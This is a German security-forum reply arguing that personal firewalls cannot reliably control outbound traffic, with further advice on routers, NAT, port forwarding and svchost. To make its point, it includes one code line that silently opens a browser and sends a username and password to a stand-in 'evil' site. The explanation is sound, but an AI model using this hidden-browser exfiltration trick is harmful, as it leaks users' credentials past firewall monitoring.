Zurück   Trojaner-Board > Malware entfernen > Antiviren-, Firewall- und andere Schutzprogramme
Firewall7Control "WSH Default Inbound Block Incoming"

Firewall7Control "WSH Default Inbound Block Incoming"


Antiviren-, Firewall- und andere Schutzprogramme: Firewall7Control "WSH Default Inbound Block Incoming"

Windows 7 Sämtliche Fragen zur Bedienung von Firewalls, Anti-Viren Programmen, Anti Malware und Anti Trojaner Software sind hier richtig. Dies ist ein Diskussionsforum für Sicherheitslösungen für Windows Rechner. Benötigst du Hilfe beim Trojaner entfernen oder weil du dir einen Virus eingefangen hast, erstelle ein Thema in den oberen Bereinigungsforen.

 
Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
Alt 05.09.2011, 20:36   #6
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Firewall7Control "WSH Default Inbound Block Incoming" - Standard

Firewall7Control "WSH Default Inbound Block Incoming"


Zitat:
Naja die PFW kann nur mit Prozess Injection umgangen werden
Naja, es gibt auch einfachere Tricks. Eingehenden Traffic, zum Filtern von "offenen" Ports, daist der Router ja schon die Barriere.
Ausgehenden Traffic kannst du nicht zuverlässig blockieren.

Mit
Code:
ATTFilter
ShellExecute(NULL, "open","http://www.poehseseite.com/?var1=$username&var2=$password", NULL,NULL, SW_HIDE);
Kann man im default Browser "sensible" Daten von einer "bösen" Seite aufrufen. Die PFW wird davon nichts mitbekommen, es sei denn bei JEDEM Traffic wirst du um Erlaubnis gefragt, aber das tut sich keiner an diese Klickorgie. Oder nickst du jede Verbindungsanfrage vom Firefox, Opera oder IE manuell ab?

=> Use ShellExecute to launch the default Web browser

Zitat:
Jedoch fühle ich mich einfach Sicherer, wenn ich weiß was für Daten aus meinen PC gelangen und welche hinein gelangen. Bzw. wenn ich weiß welche Prozesse Daten rein und rausschicken dürfen.
Gefühlte, vorgetäuschte "Sicherheit" durch eine PFW ist sinnfrei und gefährlich.
Also ich halte von solchen Spielerien wenig bis garnichts, v.a. wenn man schon einen Router hat, braucht man sich nun wirklich nicht mit zusätzlicher Software das System zu verhunzen. Nun gut, nun mag Win7 Firewall Control auf der Windows-Firewall aufbauen, dennoch liegt da die Gefahr hoch, ständig mit nervenden Meldungen überschüttet zu werden.

Lies einfach mal hier, ich denke dann sollte es etwas klarer werden:

Die Vertrauensbrecher c't Editorial über Internet Security Suites und warum sie idR nichts taugen
Oberthal online: Personal Firewalls: Sinnvoll oder sinnfrei?
personal firewalls ? Wiki ? ubuntuusers.de

Zitat:
Naja da ich ein Mensch bin der niemanden vertraut und es deswegen keine vertrauenswürdigen Programme für mich gibt. Und deswegen komme ich nicht dadran vorbei solche unvertrauenswürdigen Programme wie iTunes für meinen IPod zu installieren. Deswegen brauche ich eine PFW um solchen Programmen die Internetverbindung zu verbieten. Selbst Windows schickt teilweise Informationen unbemerkt durchs Internet...
Wer Apple nicht traut, sollte auch nicht unbedingt Produkte von ihnen nicht kaufen. Trotzdem wird es gemacht
Und wie bereits oben erwähnt, kannst du damit eben NICHT zuverlässig die Kommunikation nach außen hin kontrollieren oder verbieten.
Wenn du meinst Windows schickt "unbemerkt" Infos durchs Internet - welche Art von Infos sollen das sein? Wenn du glaubst, MS verletzt deine Privatssphäre und spioniert dich aus, warum hast du nicht schon längst Windows durch ein quelloffenes Betriebssystem ersetzt?

Zitat:
Ok, bin kein Experte in der Router Funktionsweise, ich dachte der Router hat für bestimmte Standard Internet Dienste bestimmte Standard Ports offen, wie z.B zum Surfen den Port 80.
Ja, Port 80 - und nicht nur dieser - ist ausgehend erlaubt. Das hat nichts damit zu tun, wenn du zB einen Apache auf deinen Rechner laufen hast, ist dieser nicht automatisch aus dem Internet erreichbar, dazu muss ein Portforwarding im Router eingestellt sein.
Auf dem Router selbst sollte Port 80 nur intern geöffnet sein, es sei denn man konfiguriert den Router so, dass seine webbrowserbasierte Konfigseite auch aus dem Internet erreichbar ist.

Zitat:
über diese der Router dann auch Pakete empfangen kann und an mich weiterleiten. Und alle Anfragen die richtung Router gehen, ohne das eine Verbindung aufgebaut ist werden auf Grund der NAT blockiert, oder liege ich da falsch?
Genau das ist ja auch Sinn und Zweck eines Routers. Hat aber immer noch nichts damit zu tun, dass ein lauschender Dienst nur dadurch erreichbar ist, wie gesagt muss ein Portforwarding eingerichtet werden, falls du meinst es wäre irgendeine Art "Risiko".

Zitat:
B2T: eigentlich geht es mir darum, zu wissen was diese Fehlermeldung bedeutet und wie ich es herausfinden kann. So wie es aussieht, müsste ja ein Windows Dienst versuchen eine Internetverbindung aufzubauen und die PFW blockt dann alle eingehenden Datenpakete. Wenn das so ist würde ich gerne wissen welche Dienst es ist... und wieso ich selbst mit der Funktion "ErlaubeAlle" diese Datenpakete weiterhin blockiere...
Bei "Hostprozess für Windows-Dienste" kann es sich eigentlich nur um svchost.exe handeln. Den zu blockieren macht genau Null Sinn, da er ein Hüllenprozess für im Grunde andere Dienste jeder Art darstellt. Wenn du den blockierst - und mehr kannst du ja anscheinend nicht, wenn du nur prozessabbildnamenbasierte Regeln erstellen kannst - können sehr viele legitime Windows-Dienste logischerweise auch nicht mehr über das Internet kommunizieren.
__________________
--> Firewall7Control "WSH Default Inbound Block Incoming"

 

Themen zu Firewall7Control "WSH Default Inbound Block Incoming"
ahnung, anfrage, bestimmte, betriebssystem, betriebssystem windows 7, control, exploit, firewall, frage, fragen, geblockt, gefahr, google, installiert, meldung, nichts, pakete, port, ports, router, verdacht, verhindern, win, win7, win7 64bit, windows, windows 7, ändern


« Was ist Malwarebytes? | Avira 6 Monate Lizenz Kostenlos »


Ähnliche Themen: Firewall7Control "WSH Default Inbound Block Incoming"


  1. Diverse Malware ("CoolSaleCoupon", "ddownlloaditkeep", "omiga-plus", "SaveSense", "SaleItCoupon"); lahmer PC & viel Werbung!
    Plagegeister aller Art und deren Bekämpfung - 11.01.2015 (16)
  2. "AD Block" entfernen
    Anleitungen, FAQs & Links - 02.01.2014 (2)
  3. "monstermarketplace.com" Infektion und ihre Folgen; "Anti-Virus-Blocker"," unsichtbare Toolbars" + "Browser-Hijacker" von selbst installiert
    Log-Analyse und Auswertung - 16.11.2013 (21)
  4. "Antiviren Werbung" "Langsamer PC" "PC stürzt ab" Banner und Popups beim surfen
    Plagegeister aller Art und deren Bekämpfung - 05.11.2013 (28)
  5. "Deutsche Post(eMail-Anhang)" Alle "EXE(Programme)" werden blockiert "WIN 7 Defender"
    Plagegeister aller Art und deren Bekämpfung - 27.12.2012 (3)
  6. "The document has moved. Redirecting"+"Popup unten rechts"+"Nicht alle Links anklickbar"
    Plagegeister aller Art und deren Bekämpfung - 24.10.2012 (38)
  7. "Der Computer ist für die Verletzung..." Desktop-Block, Win7 64Bit
    Log-Analyse und Auswertung - 05.08.2012 (2)
  8. Maleware blockt Seite IP-BLOCK 83.128.77.98 Type: incoming, Port: 29018, Process: skype.exe
    Plagegeister aller Art und deren Bekämpfung - 08.05.2012 (1)
  9. "Trojan-Spy.Win32.Zbot.dnei" in "C:\Users\Default.Default-PC\AppData\Roaming"
    Plagegeister aller Art und deren Bekämpfung - 12.03.2012 (11)
  10. aswMBR.exe findet "Windows XP default MBR code" auf Win7 64bit System und unbekannte Partitionstabel
    Log-Analyse und Auswertung - 29.10.2011 (5)
  11. Öffentliches Netzwerk: Opera sendet/empfängt Daten an/von "Dani-PC", "Anne-PC", "PAULA-HP"...
    Netzwerk und Hardware - 02.05.2011 (14)
  12. Wie soll ich "HTML/Rce.gen" in "\Firefox\Profiles\p2hadvdz.default\Cache" entfernen?
    Plagegeister aller Art und deren Bekämpfung - 06.02.2011 (1)
  13. "Adware.Virtumonde"/"Downloader.MisleadApp"/"TR/VB.agt.4"/"NewDotNet.A.1350"/"Fakerec
    Plagegeister aller Art und deren Bekämpfung - 22.08.2008 (6)
  14. Beheben des Problems "kein Internet"/"rsvp32_2.dll"/"Can't load library from memory"
    Plagegeister aller Art und deren Bekämpfung - 25.03.2007 (22)
  15. ">"">><meta http-equiv="Refresh" content="0;url=http://askimizsonsuza.com/code/">"">
    Plagegeister aller Art und deren Bekämpfung - 04.09.2006 (4)
  16. Bekomme "http://default.home/" und "ACCESS BLOCKED - VIRUS WARNING" nicht mehr los
    Log-Analyse und Auswertung - 16.01.2005 (5)
  17. Beim Herunterfahren "Memory Error in Block... navpsvc.exe
    Plagegeister aller Art und deren Bekämpfung - 15.09.2004 (12)
Anleitungen und Tipps

- Für alle Hilfesuchenden! Was beachten?

- Anleitung: MyStartSearch.com entfernen

- Anleitung: WebSearches löschen

- Hilfe: iStartSurf entfernen – so gehts!

- Anleitung: Omiga Plus richtig entfernen

- Browser Viren entfernen


Zum Thema Firewall7Control "WSH Default Inbound Block Incoming" - Zitat: Naja die PFW kann nur mit Prozess Injection umgangen werden Naja, es gibt auch einfachere Tricks. Eingehenden Traffic, zum Filtern von "offenen" Ports, daist der Router ja schon die - Firewall7Control "WSH Default Inbound Block Incoming"...
Archiv
Du betrachtest: Firewall7Control "WSH Default Inbound Block Incoming" auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131